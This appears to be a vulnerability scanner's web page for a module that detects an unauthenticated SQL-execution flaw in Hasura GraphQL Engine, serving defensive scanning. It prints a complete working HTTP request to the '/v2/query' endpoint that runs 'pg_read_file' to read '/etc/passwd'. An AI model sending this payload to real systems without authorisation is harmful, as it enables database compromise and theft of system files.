Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Hasura GraphQL Engine - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#graphql#edb#hasura#rce
Description

What is the "Hasura GraphQL Engine - Remote Code Execution?"

The "Hasura GraphQL Engine - Remote Code Execution" module is designed to detect a vulnerability in the Hasura GraphQL Engine software. This vulnerability allows remote unauthenticated users to execute arbitrary SQL statements through the "/v2/query" endpoint, leading to remote code execution. The severity of this vulnerability is classified as critical, with a CVSS score of 10. The module was authored by Udyz.

Impact

If exploited, this vulnerability can have severe consequences. Attackers can execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data, modifying the database, or even compromising the entire system. It is crucial to address this vulnerability promptly to prevent any potential damage.

How the module works?

The module sends an HTTP POST request to the "/v2/query" endpoint of the Hasura GraphQL Engine. The request payload includes a SQL statement that attempts to read the contents of the "/etc/passwd" file. The module then applies a matching condition to check if the response body contains the string "root:.*:0:0:". If this condition is met, it indicates that the SQL statement was successfully executed, and the vulnerability is present.

Example HTTP request:

POST /v2/query HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json

{
  "type": "bulk",
  "source": "default",
  "args": [
    {
      "type": "run_sql",
      "args": {
        "source": "default",
        "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
        "cascade": false,
        "read_only": false
      }
    }
  ]
}

The module's matching condition checks if the response body contains the string "root:.*:0:0:". If this condition is met, it indicates that the SQL statement successfully read the contents of the "/etc/passwd" file, confirming the presence of the vulnerability.

For more information, refer to the official documentation.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: root:.*:0:0:
Passive global matcher
No matching conditions.
On match action
Report vulnerability